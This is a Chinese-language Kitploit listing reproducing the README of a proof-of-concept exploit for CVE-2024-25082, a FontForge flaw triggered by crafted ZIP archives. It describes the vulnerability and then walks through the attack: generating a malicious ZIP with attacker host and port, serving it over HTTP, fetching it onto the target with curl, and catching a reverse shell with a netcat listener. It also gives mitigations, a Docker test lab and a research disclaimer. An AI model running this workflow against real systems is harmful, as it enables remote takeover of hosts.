Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-25082 | Kitploit
工具/GitHubGitHub/moamenx8/cve-2024-25082
Payload生成漏洞分析漏洞利用渗透测试学习与教育远程访问工具
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

⚠️ CVE-2024-25082 - FontForge ZIP 远程代码执行 (PoC)

License Python CVE

CVE-2024-25082 的概念验证漏洞利用程序,该漏洞影响 FontForge,允许通过特制的 ZIP 压缩包实现远程代码执行 (RCE)。

本仓库演示了如何在受控的实验环境中利用该漏洞,用于安全研究和教育目的。


漏洞概述

  • CVE ID: CVE-2024-25082\
  • 受影响软件: FontForge\
  • 漏洞类型: 远程代码执行\
  • 攻击向量: 恶意 ZIP 压缩包\
  • 影响: 处理特制压缩包时可执行任意命令。

该漏洞源于对 ZIP 压缩包内文件验证不当,使攻击者能够在目标系统上执行任意命令。


仓库结构

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

文件 描述


exploit.py 生成恶意 ZIP 载荷 poc/ 包含生成的概念验证文件 writeup.md 漏洞的技术说明


环境要求

  • Python 3.x
  • Netcat

安装可选工具:

root@kitploit:~
sudo apt install netcat

使用方法

1️⃣ 生成恶意载荷

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

这将生成一个恶意的 exploit.zip 文件。


2️⃣ 托管漏洞利用文件

root@kitploit:~
python3 -m http.server 8080

3️⃣ 在目标系统中下载载荷

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ 捕获反向 Shell

root@kitploit:~
nc -lvnp <Your Port>

如果成功,将会从目标系统获得一个 Shell。


复现漏洞

docker/ 目录中提供了一个可复现的漏洞环境。

示例:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

这样可以安全地进行测试,而不会影响生产系统。


安全影响

能够上传或控制受漏洞影响应用程序所处理 ZIP 文件的攻击者可能:

  • 执行任意系统命令
  • 获取远程 Shell 访问权限
  • 危害宿主机系统

缓解措施

建议的缓解措施:

  • 将 FontForge 更新到已修补的版本
  • 验证上传的压缩包内容
  • 限制文件上传功能
  • 处理字体时使用沙箱

免责声明

本仓库包含针对已公开漏洞的概念验证代码。

该代码严格仅供以下用途:

  • 安全研究
  • 教育目的
  • 授权的渗透测试

未经明确许可,请勿将此代码用于任何系统。

作者对因使用本软件而造成的滥用或损害不承担任何责任。


作者

Moamen Elmaghrabi

网络安全专业学生
渗透测试与漏洞利用开发


许可证

本项目基于 MIT 许可证授权。
有关详细信息,请参阅 LICENSE 文件。

下载工具